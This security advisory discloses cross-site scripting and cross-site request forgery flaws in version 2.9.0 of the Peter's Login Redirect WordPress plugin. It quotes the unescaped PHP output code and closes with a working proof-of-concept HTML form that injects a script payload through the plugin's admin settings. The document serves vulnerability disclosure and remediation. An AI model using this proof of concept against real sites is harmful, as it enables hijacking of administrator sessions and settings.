Abstract
A Cross-Site Scripting vulnerability was found in the Peter's Login Redirect WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In addition the Plugin is vulnerable to Cross-Site Request Forgery, which allows an attacker to change any setting of this plugin. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
OVE ID
OVE-20160724-0028
Tested versions
This issue was successfully tested on Peter's Login Redirect WordPress Plugin version 2.9.0.
Fix
This issue is resolved in Peter's Login Redirect version 2.9.1.
Introduction
The Peter's Login Redirect WordPress Plugin redirect users to different locations after logging in and logging out. A Cross-Site Scripting vulnerability was found in the Peter's Login Redirect WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In addition the Plugin is vulnerable to Cross-Site Request Forgery, which allows an attacker to change any setting of this plugin.
Details
This issue exists because Peter's Login Redirect lacks protection against Cross-Site Request Forgery attacks. In addition, the plugin lacks proper output encoding, rendering it vulnerable to Cross-Site Scripting. See for example the following code fragment.
elseif( $rul_type == 'role' )
{
$rul_rolevalues .= '<form name="rul_role_edit_form[' . $i_role . ']" action="?page=' . basename(__FILE__) . '" method="post">';
$rul_rolevalues .= '<tr>';
$rul_rolevalues .= '<td><p><input type="hidden" name="rul_role" value="' . $rul_value . '" /> ' . $rul_value . '</p></td>';
$rul_rolevalues .= '<td>';
$rul_rolevalues .= '<p>' . __('Login URL', 'peters-login-redirect' ) . '<br /><input type="text" size="90" maxlength="500" name="rul_role_address" value="' . **$rul_url** . '" /></p>';
$rul_rolevalues .= '<p>' . __('Logout URL', 'peters-login-redirect' ) . '<br /><input type="text" size="60" maxlength="500" name="rul_role_logout" value="' . **$rul_url_logout** . '" /></p>';
$rul_rolevalues .= '</td>';
$rul_rolevalues .= '<td><p><input name="rul_role_edit" type="submit" value="' . __( 'Edit', 'peters-login-redirect' ) . '" /> <input type="submit" name="rul_role_delete" value="' . __( 'Delete', 'peters-login-redirect' ) . '" /></p></td>';
$rul_rolevalues .= '</tr>';
$rul_rolevalues .= '</form>';
$rul_roles_existing[$rul_value] = '';
++$i_role;
}
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Proof of concept
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=wplogin_redirect.php" method="POST">
<input type="hidden" name="rul_role" value="administrator" />
<input type="hidden" name="rul_role_address" value=""><script>alert(1);</script>" />
<input type="hidden" name="rul_role_logout" value="" />
<input type="hidden" name="rul_role_submit" value="Add role rule" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>